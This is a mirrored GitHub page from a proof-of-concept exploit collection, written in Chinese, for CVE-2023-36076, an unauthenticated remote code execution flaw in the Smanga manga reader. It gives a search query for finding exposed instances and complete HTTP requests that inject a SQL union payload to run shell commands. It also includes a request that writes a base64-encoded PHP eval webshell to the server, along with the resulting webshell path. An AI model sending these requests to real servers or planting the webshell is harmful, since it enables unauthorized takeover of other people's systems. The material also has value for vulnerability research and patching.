admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-13 03:16:31 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/smanga/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

3.2 KiB
Raw Blame History

Smanga未授权远程代码执行漏洞(CVE-2023-36076)

一、漏洞简介

Smanga无需配置docker直装的漫画流媒体阅读工具。以emby plex为灵感为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞攻击者可在目标主机执行任意命令获取服务器权限。

二、影响版本

  • Smanga

三、资产测绘

  • hunterweb.title=="smanga"
  • 特征

1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png

四、漏洞复现

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59.png

获取命令执行结果

GET /php/manga/1.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce.png

写入webshell

POST /php/manga/delete.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

webshell地址

/php/manga/1.php

1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77.png

更新: 2024-02-29 23:55:42
原文: https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33